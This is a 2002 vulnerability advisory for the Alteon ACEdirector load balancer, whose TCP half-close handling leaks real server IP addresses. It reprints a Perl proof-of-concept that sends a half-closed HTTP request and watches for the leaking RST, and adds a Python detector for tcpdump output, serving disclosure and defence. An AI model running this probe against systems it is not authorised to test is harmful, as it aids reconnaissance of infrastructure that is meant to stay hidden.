Alteon ACEdirector Half-Closed HTTP Request IP Address Disclosure Vulnerability

Published: 2002-01-28
Updated: 2002-01-28
Severity: Medium
Threat: Server information disclosure
Error type: Design error
Exploitation: Server mode
BUGTRAQ ID: 3964

Affected systems

Nortel Networks WebOS 9.0

Detailed description

Alteon ACEdirector is a hardware solution that runs the Nortel WebOS operating system.

When a client connects to a web service through the ACEdirector's virtual IP address, the connection to a server in the load-balanced pool is tracked by cookie and session ID. When the client half-closes the connection, the load balancer no longer rewrites the real IP address behind the ACEdirector and sends the traffic straight to the client, so the real IP address is disclosed.

Test code

    #! /usr/local/bin/perl

    # acedirector_request - trivial script to do an HTTP Simple-Request of "/"
    #                       utilizing TCP half-close.
    #
    # This script was written to demonstrate how one can
    # elicit erroneous behavior from an Alteon/Nortel
    # ACEdirector which has been configured to use its
    # "Server Load Balancing" (SLB) and "Cookie-Based
    # Persistence" features.
    #
    # Dave Plonka <plonka@doit.wisc.edu>, Dec 20 2001

    use IO::Socket;
    use FindBin;
    use Getopt::Std;

    # -c COOKIE is optional; the web server name is required.
    if (!getopts('c:') or '' eq $ARGV[0]) {
        die "usage: $FindBin::Script [-c COOKIE] web_server\n"
    }

    my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                     PeerPort => 'http(80)',
                                     Proto    => 'tcp');
    die unless ref($sock);

    if (!$opt_c) {
        print $sock "GET /\r\n";
    } else {
        print $sock "GET / HTTP/1.0\r\nCookie: ${opt_c}=X\r\n\r\n";
    }

    # Half-close: shut down only the sending side of the connection.
    $sock->shutdown(1);

    @response = <$sock>;

    if (@response) {
        print join("\n", @response)
    } else {
        if ($opt_c) {
            my $command = "tcpdump -nv tcp and port 80 and not host $ARGV[0]";
            warn "$ARGV[0] did not respond to TCP half-closed request.\n" .
                 " Launching tcpdump to watch for RST...\n";
            system($command . " 2>&1");
            if (0 != ($?/256)) {
                warn "\"$command\" failed.\n"
            }
        } else {
            warn "$ARGV[0] did not response to TCP half-closed request.\n" .
                 "It might be an ACEdirector.\n"
        }
    }

    exit

Solution

None yet.

Related information

Dave Plonka <dplonka@mil.doit.wisc.edu>
Related page: http://www.securityfocus.com/archive/1/252455
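
Since no fix is listed, the exposure can be checked for on the client-facing side of the load balancer. The following is an added example, not part of the original advisory or of Dave Plonka's script: it scans `tcpdump -n` text output for port-80 packets whose source is a pool address instead of the virtual IP, which is the same condition the script's `not host` filter watches for. The function name, the addresses and the sample capture lines are constructed for illustration.

```python
import ipaddress
import re

# Address/flags part of a `tcpdump -n` TCP line: "IP src.sport > dst.dport: Flags [..]"
LINE_RE = re.compile(
    r"IP (\d+\.\d+\.\d+\.\d+)\.(\d+) > (\d+\.\d+\.\d+\.\d+)\.(\d+): Flags \[([^\]]*)\]"
)

def find_leaks(lines, vip, real_nets, service_port=80):
    """Return (src, dst, flags) for each client-bound packet whose source is a
    real-server address instead of the VIP (same idea as `not host VIP`)."""
    vip_addr = ipaddress.ip_address(vip)
    nets = [ipaddress.ip_network(n) for n in real_nets]
    leaks = []
    for line in lines:
        m = LINE_RE.search(line)
        if not m:
            continue  # non-TCP or unparsable line
        src = ipaddress.ip_address(m.group(1))
        dst = ipaddress.ip_address(m.group(3))
        if int(m.group(2)) != service_port or src == vip_addr:
            continue  # not a server reply, or correctly rewritten to the VIP
        from_pool = any(src in n for n in nets)
        to_pool = any(dst in n for n in nets)
        if from_pool and not to_pool:
            leaks.append((str(src), str(dst), m.group(5)))
    return leaks

# Constructed sample (not real traffic): VIP 192.0.2.10, pool 10.10.0.0/24,
# client 198.51.100.7. The last TCP line is the un-rewritten RST.
SAMPLE = [
    "12:00:01.000100 IP 198.51.100.7.40312 > 192.0.2.10.80: Flags [S], seq 1000, win 64240, length 0",
    "12:00:01.000400 IP 192.0.2.10.80 > 198.51.100.7.40312: Flags [S.], seq 2000, ack 1001, win 65535, length 0",
    "12:00:01.001200 IP 198.51.100.7.40312 > 192.0.2.10.80: Flags [P.], seq 1001:1045, ack 2001, win 64240, length 44",
    "12:00:01.001300 IP 198.51.100.7.40312 > 192.0.2.10.80: Flags [F.], seq 1045, ack 2001, win 64240, length 0",
    "12:00:01.002900 IP 10.10.0.11.80 > 198.51.100.7.40312: Flags [R], seq 2001, win 0, length 0",
    "12:00:01.003000 ARP, Request who-has 192.0.2.1 tell 192.0.2.10, length 28",
]

if __name__ == "__main__":
    for src, dst, flags in find_leaks(SAMPLE, "192.0.2.10", ["10.10.0.0/24"]):
        print(f"real-server address {src} exposed to {dst} (flags [{flags}])")
```

Any hit means a pool address crossed the load balancer without being rewritten to the virtual IP; an egress filter that drops client-bound packets sourced from the pool range would contain it.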